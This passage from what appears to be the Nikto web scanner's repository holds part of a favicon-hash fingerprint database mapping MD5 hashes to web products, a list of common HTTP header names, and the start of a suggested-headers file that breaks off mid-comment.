CMS)\"\n\"500523\",\"d99217782f41e71bcaa8e663e6302473\",\"Apache on Red Hat/Fedora\"\n\"500524\",\"a8fe5b8ae2c445a33ac41b33ccc9a120\",\"Arris Touchstone Device\"\n\"500525\",\"d16a0da12074dae41980a6918d33f031\",\"ST 605\"\n\"500526\",\"befcded36aec1e59ea624582fcb3225c\",\"SpeedTouch\"\n\"500527\",\"e4a509e78afca846cd0e6c0672797de5\",\"i3micro VRG\"\n\"500528\",\"3541a8ed03d7a4911679009961a82675\",\"status.net\"\n\"500529\",\"fa2b274fab800af436ee688e97da4ac4\",\"Etherpad\"\n\"500530\",\"83245b21512cc0a0e7a67c72c3a3f501\",\"OpenXPKI\"\n\"500531\",\"85138f44d577b03dfc738d3f27e04992\",\"Gitweb\"\n\"500532\",\"70625a6e60529a85cc51ad7da2d5580d\",\"SSLstrip \"\n\"500533\",\"99306a52c76e19e3c298a46616c5899c\",\"aMule (2.2.2)\"\n\"500534\",\"31c16dd034e6985b4ba929e251200580\",\"Stephen Turner Analog (6.0)\"\n\"500535\",\"2d4cca83cf14d1adae178ad013bdf65b\",\"Ant docs manual (1.7.1)\"\n\"500536\",\"032ecc47c22a91e7f3f1d28a45d7f7bc\",\"Ant docs (1.7.1) / libjakarta-poi-java (3.0.2)\"\n\"500537\",\"31aa07fe236ee504c890a61d1f7f0a97\",\"apache2 (2.2.9) docs-manual\"\n\"500538\",\"c0c4e7c0ac4da24ab8fc842d7f96723c\",\"xsp (1.9.1)\"\n\"500539\",\"d6923071afcee9cebcebc785da40b226\",\"autopsy (2.08)\"\n\"500540\",\"7513f4cf4802f546518f26ab5cfa1cad\",\"axyl (2.6.0)\"\n\"500541\",\"de68f0ad7b37001b8241bce3887593c7\",\"b2evolution (2.4.2)\"\n\"500542\",\"140e3eb3e173bfb8d15778a578a213aa\",\"bmpx (0.40.14)\"\n\"500543\",\"4f12cccd3c42a4a478f067337fe92794\",\"cacti (0.8.7b)\"\n\"500544\",\"c0533ae5d0ed638ba3fb3485d8250a28\",\"CakePHP (1.1.x)\"\n\"500545\",\"66b3119d379aee26ba668fef49188dd3\",\"cakephp (1.2.x-1.3x)\"\n\"500546\",\"09f5ea65a2d31da8976b9b9fd2bf853c\",\"caudium (1.4.12)\"\n\"500547\",\"f276b19aabcb4ae8cda4d22625c6735f\",\"cgiirc (0.5.9)\"\n\"500548\",\"a18421fbf34123c03fb8b3082e9d33c8\",\"chora2 (2.0.2) \"\n\"500549\",\"23426658f03969934b758b7eb9e8f602\",\"chronicle (2.9) theme-steve\"\n\"500550\",\"75069c2c6701b2be250c05ec494b1b31\",\"chronicle (2.9) theme-blog.mail-scanning.com\"\n\"500551\",\"27c3b07523efd6c318a201cac58008ba\",\"cimg (1.2.0.1) \"\n\"500552\",\"ae59960e866e2730e99799ac034eacf7\",\"webcit (7.37)\"\n\"500553\",\"2ab2aae806e8393b70970b2eaace82e0\",\"couchdb (0.8.0-0.9.1)\"\n\"500554\",\"ddd76f1cfe31499ce3db6702991cbc45\",\"cream (0.41)\"\n\"500555\",\"74120b5bbc7be340887466ff6cfe66c6\",\"cups (1.3.9) - doc\"\n\"500556\",\"abeea75cf3c1bac42bbd0e96803c72b9\",\"doc-iana-20080601\"\n\"500557\",\"3ef81fad2a3deaeb19f02c9cf67ed8eb\",\"dokuwiki (0.0.20080505) \"\n\"500558\",\"e6a9dc66179d8c9f34288b16a02f987e\",\"Drupal CMS (5.10) \"\n\"500559\",\"bba9f1c29f100d265865626541b20a50\",\"dtc (0.28.10) \"\n\"500560\",\"171429057ae2d6ad68e2cd6dcfd4adc1\",\"ebug-http (0.31)\"\n\"500561\",\"f6e9339e652b8655d4e26f3e947cf212\",\"eGroupWare (1.0.0.009, 1.4.004-2) (/phpgwapi/templates/idots/images/favicon.ico)\"\n\"500562\",\"093551287f13e0ee3805fee23c6f0e12\",\"freevo (1.8.1) \"\n\"500563\",\"56753c5386a70edba6190d49252f00bb\",\"gallery (1.5.8)\"\n\"500564\",\"54b299f2f1c8b56c8c495f2ded6e3e0b\",\"garlic-doc (1.6) \"\n\"500565\",\"857281e82ea34abbb79b9b9c752e33d2\",\"gforge (4.6.99+svn6496) - webcalendar\"\n\"500566\",\"27a097ec0dbffb7db436384635d50415\",\"gforge (4.6.99+svn6496) - images\"\n\"500567\",\"0e14c2f52b93613b5d1527802523b23f\",\"gforge (4.6.99+svn6496) \"\n\"500568\",\"c9339a2ecde0980f40ba22c2d237b94b\",\"glpi (0.70.2)\"\n\"500569\",\"db1e3fe4a9ba1be201e913f9a401d794\",\"gollem (1.0.3)\"\n\"500570\",\"921042508f011ae477d5d91b2a90d03f\",\"gonzui (1.2+cvs20070129) \"\n\"500571\",\"ecab73f909ddd28e482ababe810447c8\",\"gosa (2.5.16.1)\"\n\"500572\",\"c16b0a5c9eb3bfd831349739d89704ec\",\"gramps (3.0.1)\"\n\"500573\",\"63d5627fc659adfdd5b902ecafe9100f\",\"gsoap (2.7.9l) \"\n\"500574\",\"462794b1165c44409861fcad7e185631\",\"hercules (3.05) \"\n\"500575\",\"3995c585b76bd5aa67cb6385431d378a\",\"horde-sam (0.1+cvs20080316) - silver\"\n\"500576\",\"ee3d6a9227e27a5bc72db3184dab8303\",\"horde-sam (0.1+cvs20080316) - graphics\"\n\"500577\",\"7cc1a052c86cc3d487957f7092a6d8c3\",\"horde (3.2.1) - graphics/tango\"\n\"500578\",\"5e99522b02f6ecadbb3665202357d775\",\"hplip (2.8.7) - installer\"\n\"500579\",\"39308a30527336e59d1d166d48c7742c\",\"Hewlett-Packard HPLIP (2.8.7) - doc\"\n\"500580\",\"43d4aa56dc796067b442c95976a864fd\",\"hunchentoot (0.15.7) \"\n\"500581\",\"32bf63ac2d3cfe82425ce8836c9ce87c\",\"ikiwiki (2.56ubuntu1)\"\n\"500582\",\"f567fd4927f9693a7a2d6cacf21b51b6\",\"Horde IMP (4.1.4 - 4.1.6, also used in Horde Groupware Webmail 1.0.1))\"\n\"500583\",\"919e132a62ea07fce13881470ba70293\",\"Horde Groupware Webmail 1.0.1 (Ingo Theme, 1.1.5)\"\n\"500584\",\"ed7d5c39c69262f4ba95418d4f909b10\",\"jetty (5.1.14)\"\n\"500585\",\"6900fab05a50a99d284405f46e5bc7f6\",\"k3d (0.6.7.0) \"\n\"500586\",\"24d1e355c00e79dc13b84d5455534fe7\",\"kdelibs (3.5.10-4.1.4) \"\n\"500587\",\"8ab2f1a55bcb0cac227828afd5927d39\",\"kdenetwork (4.1.4)\"\n\"500588\",\"54667bea91124121e98da49e55244935\",\"kolab-webadmin (2.1.0-20070510)\"\n\"500589\",\"a5b126cdeaa3081f77a22b3e43730942\",\"Horde Groupware Webmail 1.0.1 (Kronolith Theme, 2.1.8)\"\n\"500590\",\"d00d85c8fb3a11170c1280c454398d51\",\"ktorrent (3.1.2) \"\n\"500591\",\"fa21ab1b1e1b4c9516afbd63e91275a9\",\"lastfmproxy (1.3b) \"\n\"500592\",\"663ee93a41000b8959d6145f0603f599\",\"ldap-account-manager (2.3.0) \"\n\"500593\",\"ea84a69cb146a947fac2ac7af3946297\",\"boost (1.34.1) \"\n\"500594\",\"eb3e307f44581916d9f1197df2fc9de3\",\"flac (1.2.1) \"\n\"500595\",\"669bc10baf11b43391294aac3e1b8c52\",\"libitpp (4.0.4)\"\n\"500596\",\"b8fe2ec1fcc0477c0d0f00084d824071\",\"lucene (2.3.2) \"\n\"500597\",\"12225e325909cee70c31f5a7ab2ee194\",\"ramaze-ruby (0.3.9.1) \"\n\"500598\",\"6be5ebd07e37d0b415ec83396a077312\",\"ramaze-ruby (0.3.9.1) - dispatcher\"\n\"500599\",\"20e208bb83f3eeed7c1aa8a6d9d3229d\",\"libswarmcache-java (1.0RC2+cvs20071027)\"\n\"500600\",\"5f8b52715c08dfc7826dad181c71dec8\",\"mahara (1.0.4)\"\n\"500601\",\"ebe293e1746858d2548bca99c43e4969\",\"Mantis Bug Tracker (1.1.2, /bugs/images/favicon.ico)\"\n\"500602\",\"0d42576d625920bcd121261fc5a6230b\",\"mathomatic (14.0.6)\"\n\"500603\",\"f972c37bf444fb1925a2c97812e2c1eb\",\"mediatomb (0.11.0)\"\n\"500604\",\"f5f2df7eec0d1c3c10b58960f3f8fb26\",\"Horde Groupware Webmail 1.0.1 (Mnemo Theme, 2.1.2) \"\n\"500605\",\"933a83c6e9e47bd1e38424f3789d121d\",\"Moodle (1.8.2, 1.9.x, multiple default themes) \"\n\"500606\",\"b6652d5d71f6f04a88a8443a8821510f\",\"Moodle (1.8.2, 1.9.x, Cornflower Theme, /theme/cornflower/favicon.ico)\"\n\"500607\",\"06b60d90ccfb79c2574c7fdc3ac23f05\",\"movabletype-opensource (4.2~rc4)\"\n\"500608\",\"21d80d9730a56b26dc9d252ffabb2987\",\"mythplugins (0.21.0+fixes18722) \"\n\"500609\",\"81df3601d6dc13cbc6bd8212ef50dd29\",\"Horde Groupware Webmail 1.0.1 (Nag Theme, 2.1.4)\"\n\"500610\",\"1c4201c7da53d6c7e48251d3a9680449\",\"nagios (3.0.2)\"\n\"500611\",\"28015fcdf84ca0d7d382394a82396927\",\"nanoblogger (3.3)\"\n\"500612\",\"868e7b460bba6fe29a37aa0ceff851ba\",\"netmrg (0.20)\"\n\"500613\",\"0b2481ebc335a2d70fcf0cba0b3ce0fc\",\"ntop (3.3)\"\n\"500614\",\"c30bf7e6d4afe1f02969e0f523d7a251\",\"nulog (2.0)\"\n\"500615\",\"9a8035769d7a129b19feb275a33dc5b4\",\"ocsinventory-server (1.01)\"\n\"500616\",\"75aeda7adbd012fa93c4ae80336b4f45\",\"parrot (0.4.13) - docs\"\n\"500617\",\"70777a39f5d1de6d3873ffb309df35dd\",\"pathological (1.1.3)\"\n\"500618\",\"82d746eb54b78b5449fbd583fc046ab2\",\"perl-doc-html (5.10.0)\"\n\"500619\",\"90c244c893a963e3bb193d6043a347bd\",\"phpgroupware (0.9.16.012) \"\n\"500620\",\"4b30eec86e9910e663b5a9209e9593b6\",\"phpldapadmin (1.1.0.5)\"\n\"500621\",\"02dd7453848213a7b5277556bcc46307\",\"phpmyadmin (2.11.8.1) - pmd \"\n\"500622\",\"d037ef2f629a22ddadcf438e6be7a325\",\"phpmyadmin (2.11.8.1)\"\n\"500623\",\"8190ead2eb45952151ab5065d0e56381\",\"pootle (1.1.0)\"\n\"500624\",\"ba84999dfc070065f37a082ab0e36017\",\"prewikka (0.9.14)\"\n\"500625\",\"0f45c2c79ebe90d6491ddb111e810a56\",\"python-cherrypy (2.3.0-3.0.2)\"\n\"500626\",\"e551b7017a9bd490fc5b76e833d689bf\",\"MoinMoin (1.7.1)\"\n\"500627\",\"275e2e37fc7be50c1f03661ef8b6ce4f\",\"myghty (1.1)\"\n\"500628\",\"68b329da9893e34099c7d8ad5cb9c940\",\"myghty (1.1) - zblog \"\n\"500629\",\"5488c1c8bf5a2264b8d4c8541e2d5ccd\",\"turbogears (1.0.4.4) - genshi/elixir\"\n\"500630\",\"6927da350550f29bc641138825dff36f\",\"python-werkzeug (0.3.1) - docs \"\n\"500631\",\"e3f28aab904e9edfd015f64dc93d487d\",\"python-werkzeug (0.3.1) - cupoftee-examples\"\n\"500632\",\"69f8a727f01a7e9b90a258bc30aaae6a\",\"quantlib-refman-html (0.9.0)\"\n\"500633\",\"b01625f4aa4cd64a180e46ef78f34877\",\"quickplot (0.8.13)\"\n\"500634\",\"af83bba99d82ea47ca9dafc8341ec110\",\"qwik (0.8.4.4ubuntu2)\"\n\"500635\",\"e9469705a8ac323e403d74c11425a62b\",\"roundcube (0.1.1)\"\n\"500636\",\"7f57bbd0956976e797b4e8eebdc6d733\",\"selfhtml (8.1.1)\"\n\"500637\",\"69acfcb2659952bc37c54108d52fca70\",\"solr (1.2.0) - docs\"\n\"500638\",\"ffc05799dee87a4f8901c458f7291d73\",\"solr (1.2.0) - admin\"\n\"500639\",\"aa2253a32823c8a5cba8d479fecedd3a\",\"sork-forwards-h3 (3.0.1)\"\n\"500640\",\"a2e38a3b0cdf875cd79017dcaf4f2b55\",\"sork-passwd-h3 (3.0)\"\n\"500641\",\"cb740847c45ea3fbbd80308b9aa4530a\",\"sork-vacation-h3 (3.0.1)\"\n\"500642\",\"7c7b66d305e9377fa1fce9f9a74464d9\",\"spe (0.8.4.h)\"\n\"500643\",\"0e2503a23068aac350f16143d30a1273\",\"sql-ledger (2.8.15)\"\n\"500644\",\"1fd3fafc1d461a3d19e91dbbba03d0aa\",\"tea (17.6.1)\"\n\"500645\",\"4644f2d45601037b8423d45e13194c93\",\"Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community\"\n\"500646\",\"1de863a5023e7e73f050a496e6b104ab\",\"torrentflux (2.4)\"\n\"500647\",\"83dea3d5d8c6feddec84884522b61850\",\"torrentflux (2.4) - themes/G4E/\"\n\"500648\",\"d1bc9681dce4ad805c17bd1f0f5cee97\",\"torrentflux (2.4) - themes/BlueFlux/\"\n\"500649\",\"8d13927efb22bbe7237fa64e858bb523\",\"transmission (1.34)\"\n\"500650\",\"5b015106854dc7be448c14b64867dfa5\",\"tulip (3.0.0~B6)\"\n\"500651\",\"ff260e80f5f9ca4b779fbd34087f13cf\",\"Horde Groupware Webmail 1.0.1 (Turba Theme, 2.1.7)\"\n\"500652\",\"e7fc436d0bf31500ced7a7143067c337\",\"twiki (4.1.2) - logos/favicon.ico\"\n\"500653\",\"9789c9ab400ea0b9ca8fcbd9952133bd\",\"twiki (4.1.2) - webpreferences \"\n\"500654\",\"2b52c1344164d29dd8fb758db16aadb6\",\"vdr-plugin-live (0.2.0)\"\n\"500655\",\"237f837bbc33cd98a9f47b20b284e2ad\",\"vdradmin-am (3.6.1) \"\n\"500656\",\"6f7e92fe7e6a62661ac2b41528a78fc6\",\"vlc (0.9.4)\"\n\"500657\",\"2507c0b0a60ecdc816ba45482affaedf\",\"webcheck (1.10.2.0) \"\n\"500658\",\"ef5169b040925a716359d131afbea033\",\"websvn (2.0) \"\n\"500659\",\"f6d0a100b6dbeb5899f0975a1203fd85\",\"witty (2.1.5)\"\n\"500660\",\"81feac35654318fb16d1a567b8b941e7\",\"yaws (1.77)\"\n\"500661\",\"33b04fb9f2ec918f5f14b41527e77f6d\",\"znc (0.058)\"\n\"500662\",\"6434232d43f27ef5462ba5ba345e03df\",\"znc (0.058, webadmin/skins/default)\"\n\"500663\",\"e07c0775523271d629035dc8921dffc7\",\"zoneminder (1.23.3)\"\n\"500664\",\"4eb846f1286ab4e7a399c851d7d84cca\",\"Plone CMS (3.1.1)\"\n\"500665\",\"e298e00b2ff6340343ddf2fc6212010b\",\"Nessus 4.x Scanner Web Client\"\n\"500666\",\"240c36cd118aa1ff59986066f21015d4\",\"LANCOM Systems\"\n\"500667\",\"ceb25c12c147093dc93ac8b2c18bebff\",\"COMpact 5020 VoIP\"\n\"500668\",\"05656826682ab3147092991ef5de9ef3\",\"RapidShare\"\n\"500669\",\"e19ffb2bc890f5bdca20f10bfddb288d\",\"Rapid7 (NeXpose)\"\n\"500670\",\"1f8c0b08fb6b556a6587517a8d5f290b\",\"owasp.org\"\n\"500671\",\"73778a17b0d22ffbb7d6c445a7947b92\",\"Apache on Mac OS X\"\n\"500672\",\"799f70b71314a7508326d1d2f68f7519\",\"JBoss Server\"\n\"500673\",\"bd0f7466d35e8ba6cedd9c27110c5c41\",\"Serena Collage (4.6, servlet/images/collage_app.ico)\"\n\"500674\",\"dc0816f371699823e1e03e0078622d75\",\"Aruba Network Devices (HTTP(S) login page)\"\n\"500675\",\"f097f0adf2b9e95a972d21e5e5ab746d\",\"Citrix Access Server\"\n\"500676\",\"28893699241094742c3c2d4196cd1acb\",\"Xerox DocuShare\"\n\"500677\",\"80656aabfafe0f3559f71bb0524c4bb3\",\"Macromedia Breeze\"\n\"500678\",\"48c02490ba335a159b99343b00decd87\",\"Octeth Technologies oemPro (3.5.5.1)\"\n\"500679\",\"eb6d4ce00ec36af7d439ebd4e5a395d7\",\"Mailman\"\n\"500680\",\"04d89d5b7a290334f5ce37c7e8b6a349\",\"Atlassian Jira Bug Tracker\"\n\"500681\",\"d80e364c0d3138c7ecd75bf9896f2cad\",\"Apache Tomcat (6.0.18), Alfresco Enterprise Content Management System\"\n\"500682\",\"a6b55b93bc01a6df076483b69039ba9c\",\"Fog Creek Fogbugz (6.1.44)\"\n\"500683\",\"ee4a637a1257b2430649d6750cda6eba\",\"Trimble Device Embedded Web Server\"\n\"500684\",\"9ceae7a3c88fc451d59e24d8d5f6f166\",\"Plesk managed system\"\n\"500685\",\"69ae01d0c74570d4d221e6c24a06d73b\",\"Roku Soundbridge\"\n\"500686\",\"2e9545474ee33884b5fb8a9a0b8806dd\",\"Ampache\"\n\"500687\",\"639b61409215d770a99667b446c80ea1\",\"Lotus Domino Server\"\n\"500688\",\"be6fb62815509bd707e69ee8dad874a1\",\"i.LON server by Echelon\"\n\"500689\",\"a46bc7fc42979e9b343335bdd86d1c3e\",\"NetScout NGenius\"\n\"500690\",\"192decdad41179599a776494efc3e720\",\"JBoss Installation\"\n\"500691\",\"de2b6edbf7930f5dd0ffe0528b2bbcf4\",\"Barracuda Spam/Virus firewall appliance\"\n\"500692\",\"386211e5c0b7d92efabd41390e0fc250\",\"SparkWeb web-based collaboration client. http://www.igniterealtime.org/\"\n\"500693\",\"f89abd3f358cb964d6b753a5a9da49cf\",\"LimeSurvey\"\n\"500694\",\"a7947b1675701f2247921cf4c2b99a78\",\"Alexander Palmo Simple PHP Blog\"\n\"500695\",\"01febf7c2bd75cd15dae3aa093d80552\",\"Atlassian Crucible or Fisheye\"\n\"500696\",\"1275afc920a53a9679d2d0e8a5c74054\",\"Atlassian Crowd\"\n\"500697\",\"12888a39a499eb041ca42bf456aca285\",\"Atlassian Confluence or Crowd\"\n\"500698\",\"3341c6d3c67ccdaeb7289180c741a965\",\"Atlassian Confluence or Crowd\"\n\"500699\",\"6c1452e18a09070c0b3ed85ce7cb3917\",\"Atlassian Jira\"\n\"500700\",\"43ba066789e749f9ef591dc086f3cd14\",\"Atlassian Bamboo\"\n\"500701\",\"a83dfece1c0e9e3469588f418e1e4942\",\"Atlassian Bamboo\"\n\"500702\",\"f0ee98b4394dfdab17c16245dd799204\",\"Drupal\"\n\"500703\",\"7b0d4bc0ca1659d54469e5013a08d240\",\"Netgear (Infrant) ReadyNAS NV+\"\n\"500704\",\"cee40c0b35bded5e11545be22a40e363\",\"OSSDL.de Openmailadmin\"\n\"500705\",\"4f88ba9f1298701251180e6b6467d43e\",\"Xinit Systems Ltd. Openfiler\"\n\"500706\",\"4c3373870496151fd02a6f1185b0bb68\",\"rPath Appliance Agent\"\n\"500707\",\"b231ad66a2a9b0eb06f72c4c88973039\",\"WordPress\"\n\"500708\",\"e1e8bdc3ce87340ab6ebe467519cf245\",\"WordPress\"\n\"500709\",\"95103d0eabcd541527a86f23b636e794\",\"WordPress Multi-User (MU)\"\n\"500710\",\"64ca706a50715e421b6c2fa0b32ed7ec\",\"Parallels Plesk Control Panel\"\n\"500711\",\"f425342764f8c356479d05daa7013c2f\",\"vBulletin forum\"\n\"500712\",\"740af61c776a3cb98da3715bdf9d3fc1\",\"vBulletin forum\"\n\"500713\",\"d7ac014e83b5c4a2dea76c50eaeda662\",\"vBulletin forum\"\n\"500714\",\"a47951fb41640e7a2f5862c296e6f218\",\"Plone CMS\"\n\"500715\",\"10bd6ad7b318df92d9e9bd03104d9b80\",\"Plone CMS\"\n\"500716\",\"e08333841cbe40d15b18f49045f26614\",\"21publish Blog\"\n\"500717\",\"e2cac3fad9fa3388f639546f3ba09bc0\",\"Invision Power Services IP.Board\"\n\"500718\",\"5ec8d0ecf7b505bb04ab3ac81535e062\",\"Telligent Community Server\"\n\"500719\",\"83a1fd57a1e1684fafd6d2487290fdf5\",\"Pligg\"\n\"500720\",\"b7f98dd27febe36b7275f22ad73c5e84\",\"MoinMoin\"\n\"500721\",\"63b982eddd64d44233baa25066db6bc1\",\"Joomla!\"\n\"500722\",\"05bc6d56d8df6d668cf7e9e11319f4e6\",\"Jive Forums\"\n\"500723\",\"63740175dae089e479a70c5e6591946c\",\"The Lyceum Project\"\n\"500724\",\"4cbb2cfc30a089b29cd06179f9cc82ff\",\"Dragonfly\"\n\"500725\",\"9187f6607b402df8bbc2aeb69a07bbca\",\"XOOPS\"\n\"500727\",\"a1c686eb6e771878cf6040574a175933\",\"CivicPlus\"\n\"500728\",\"4d7fe200d85000aea4d193a10e550d04\",\"Intland Software codeBeamer\"\n\"500729\",\"1a9a1ec2b8817a2f951c9f1793c9bc54\",\"Bitweaver\"\n\"500730\",\"1cc16c64d0e471607677b036b3f06b6e\",\"Roller Weblogger Project\"\n\"500731\",\"7563f8c3ebd4fd4925f61df7d5ed8129\",\"Holger Zimmerman Pi3Web HTTP Server\"\n\"500732\",\"7f0f918a78ca8d4d5ff21ea84f2bac68\",\"SubText\"\n\"500733\",\"86e3bf076a018a23c12354e512af3b9c\",\"Spyce\"\n\"500734\",\"9c003f40e63df95a2b844c6b61448310\",\"DD-WRT Embedded Web Server\"\n\"500735\",\"9a9ee243bc8d08dac4448a5177882ea9\",\"Dvbbs Forum\"\n\"500736\",\"ee1169dee71a0a53c91f5065295004b7\",\"ProjectPier\"\n\"500737\",\"7214637a176079a335d7ac529011f4e4\",\"phpress\"\n\"500738\",\"1bf954ba2d568ec9771d35c94a6eb2dc\",\"WoltLab Burning Board\"\n\"500739\",\"ff3b533b061cee7cfbca693cc362c34a\",\"Kayako SupportSuite\"\n\"500740\",\"428b23df874b41d904bbae29057bdba5\",\"Comsenz Technology Ltd ECShop\"\n\"500741\",\"8757fcbdbd83b0808955f6735078a287\",\"Comsenz Technology Ltd Discuz!\"\n\"500742\",\"9fac8b45400f794e0799d0d5458c092b\",\"Comsenz Technology Ltd Discuz!\"\n\"500743\",\"4e370f295b96eef85449c357aad90328\",\"Comsenz Technology Ltd SupeSite\"\n\"500744\",\"4cfbb29d0d83685ba99323bc0d4d3513\",\"PHPWind Forums 7\"\n\"500745\",\"2df6edffca360b7a0fadc3bdf2191857\",\"PIPS Technology ATZ Executive / Automatic Licence Plate Recognition (ALPR) System\"\n\"500746\",\"8c291e32e7c7c65124d19eb17bceca87\",\"Schneider Electric Modicon 340 / BMX P34 CPU B\"\n\"500747\",\"6dcab71e60f0242907940f0fcda69ea5\",\"Ubiquiti Ubiquiti M Series / AirOS\"\n\"500748\",\"09a1e50dc3369e031b97f38abddd10c8\",\"Ubiquiti Ubiquiti M Series / AirOS\"\n\"500749\",\"7b345857204926b62951670cd17a08b7\",\"AXESS TMC X1 or X2 Terminal\"\n\"500750\",\"0f584138aacfb79aaba7e2539fc4e642\",\"Plex Media Server\"\n\"500751\",\"4973c3c3067f8526ad0dacd2823b814e\",\"Adobe Experience Manager/CQ5\"\n\"500752\",\"7a52b2a795dabe950e9dd2381ded8dc7\",\"Adobe CRXDE Lite\"\n\"500753\",\"5a77e47fa23554a4166d2303580b0733\",\"Sawmill\"\n\"500754\",\"39a1599714e68d8d9af295f8dc5ab314\",\"Apache\"\n\"500755\",\"ca5aeaaabc9019eb5ce8e03ec3bd809d\",\"Apache\"\n\"500756\",\"fc4f0fca3dc008655feb2563fa7bbdd2\",\"Apache\"\n\"500757\",\"ab5fbb78e839bac0eee74787740475e8\",\"Apache\"\n\"500758\",\"f4d83423148320676d1db1269c333da2\",\"Apache\"\n\"500759\",\"a2b03592bd74d3bf6b71a327a4b39ff6\",\"Apache\"\n\"500760\",\"e2f638a6572e9270ac73402f6481425b\",\"Apache\"\n\"500761\",\"2b354dcd9968722567eaf374d6ed2132\",\"Apache\"\n\"500762\",\"4afcc9582b28af45ce8a1312761d8d4c\",\"Apache\"\n\"500763\",\"8d3fd22cab7ad1a6b10ae10e96143333\",\"Apache\"\n\"500764\",\"3e87f7b72db63dfb1700207d0ee0ec13\",\"Apache\"\n\"500765\",\"5d48c15b19222264f533c25943519861\",\"Apache\"\n\"500766\",\"e738f22aab002bd66350d1b2d930e9a9\",\"Apache\"\n\"500767\",\"42bb648e781be6baa099b76e75609126\",\"Apache\"\n\"500768\",\"07e9163f7ca8cfe6c1d773f895fbebad\",\"Apache\"\n\"500769\",\"aa9b62c9aa50e0bc1f77061e6362d736\",\"Apache\"\n\"500770\",\"a4eb4e0aa80740db8d7d951b6d63b2a2\",\"ownCloud\"\n\"500771\",\"56974e6b57c7bd51448c309915ca0d6c\",\"Ghost blog (0.7.x)\"\n\"500772\",\"91b72b23e7f499d6c09cb18c7b1278f1\",\"Kodi Media Center 16.x (Web Interface)\"\n\"500773\",\"92c5d340d08c6d33676a41ba8dece857\",\"Android PAW Server\"\n\"500774\",\"81edeec6e603d73d52bf85a3354fd093\",\"JAMF Software/Casper Suite\"\n\"500775\",\"c1f20852dd1caf078f49de77a2de8e3f\",\"vBulletin forum\"\n\"500776\",\"e462005902f81094ab3de44e4381de19\",\"Fortinet Device\"\n\"500777\",\"b3045c004dd765466e84bd057eaaa795\",\"Skype for Business\"\n\"500778\",\"23e8c7bd78e8cd826c5a6073b15068b1\",\"Jenkins\"\n\"500779\",\"1391664373e72311a656c4a5504682af\",\"Jira\"\n\"500780\",\"995bbe5b7ba2be254ea2752bd66b2f79\",\"Cockpit linux web admin\"\n"
  },
  {
    "path": "program/databases/db_headers_common",
    "content": "#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (sullo@cirt.net)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# - Lowercase only\n#######################################################################\n\"header\"\n\"accept\"\n\"accept-ch\"\n\"accept-charset\"\n\"accept-encoding\"\n\"accept-language\"\n\"accept-ranges\"\n\"access-control-allow-credentials\"\n\"access-control-allow-headers\"\n\"access-control-allow-methods\"\n\"access-control-allow-origin\"\n\"access-control-expose-headers\"\n\"access-control-max-age\"\n\"age\"\n\"allow\"\n\"alternates\"\n\"alt-svc\"\n\"authorization\"\n\"bfcache-opt-in\"\n\"cache-control\"\n\"cf-cache-status\"\n\"cf-edge-cache\"\n\"cf-ray\"\n\"cf-request-id\"\n\"commerce-server-software\"\n\"connection\"\n\"content-encoding\"\n\"content-language\"\n\"content-length\"\n\"content-location\"\n\"content-md5\"\n\"content-range\"\n\"content-security-policy\"\n\"content-security-policy-report-only\"\n\"content-type\"\n\"critical-ch\"\n\"cross-origin-embedder-policy\"\n\"cross-origin-opener-policy\"\n\"cross-origin-resource-policy\"\n\"dasl\"\n\"date\"\n\"dav\"\n\"etag\"\n\"expect\"\n\"expect-ct\"\n\"expires\"\n\"fastly-restarts\"\n\"feature-policy\"\n\"from\"\n\"host\"\n\"if-match\"\n\"if-modified-since\"\n\"if-none-match\"\n\"if-range\"\n\"if-unmodified-since\"\n\"keep-alive\"\n\"last-modified\"\n\"link\"\n\"location\"\n\"max-forwards\"\n\"mime-version\"\n\"nel\"\n\"nncoection\"\n\"p3p\"\n\"persistent-auth\"\n\"permissions-policy\"\n\"pragma\"\n\"proxy-authenticate\"\n\"proxy-authorization\"\n\"proxy-connection\"\n\"public\"\n\"range\"\n\"referer\"\n\"referrer-policy\"\n\"report-to\"\n\"retry-after\"\n\"server\"\n\"server-timing\"\n\"set-cookie\"\n\"status\"\n\"strict-transport-security\"\n\"te\"\n\"timing-allow-origin\"\n\"traceparent\"\n\"trailer\"\n\"transfer-encoding\"\n\"upgrade\"\n\"user-agent\"\n\"vary\"\n\"via\"\n\"warning\"\n\"whisker\"\n\"www-authenticate\"\n\"x-aspnetmvc-version\"\n\"x-aspnet-version\"\n\"x-cache\"\n\"x-cache-group\"\n\"x-cache-hits\"\n\"x-cache-info\"\n\"x-clacks-overhead\"\n\"x-cloud-trace-context\"\n\"x-cnection\"\n\"x-content-security-policy\"\n\"x-content-type-options\"\n\"x-download-options\"\n\"x-drupal-cache\"\n\"x-frame-options\"\n\"x-generator\"\n\"x-google-gfe-backend-request-cost\"\n\"x-google-gfe-load-report\"\n\"x-guploader-uploadid\"\n\"x-id\"\n\"x-nf-request-id\"\n\"xmlns\"\n\"x-amz-cf-id\"\n\"x-amz-cf-pop\"\n\"x-amzn-requestid\"\n\"x-amz-version-id\"\n\"x-azure-ref\"\n\"x-cdn\"\n\"x-correlation-id\"\n\"x-dns-prefetch-control\"\n\"x-fd-int-roxy-purgeid\"\n\"x-mod-pagespeed\"\n\"x-ms-request-id\"\n\"x-pad\"\n\"x-page-speed\"\n\"x-permitted-cross-domain-policies\"\n\"x-pingback\"\n\"x-powered-by\"\n\"x-robots-tag\"\n\"x-timer\"\n\"x-ua-compatible\"\n\"x-varnish\"\n\"x-webkit-csp\"\n\"x-xss-protection\"\n"
  },
  {
    "path": "program/databases/db_headers_suggested",
    "content": "#######################################################################\n# File Source: https://cirt.net\n# (c) 2024 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (sullo@cirt.net)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# - Use lowercase only\n# - Keep list alphabetically (for 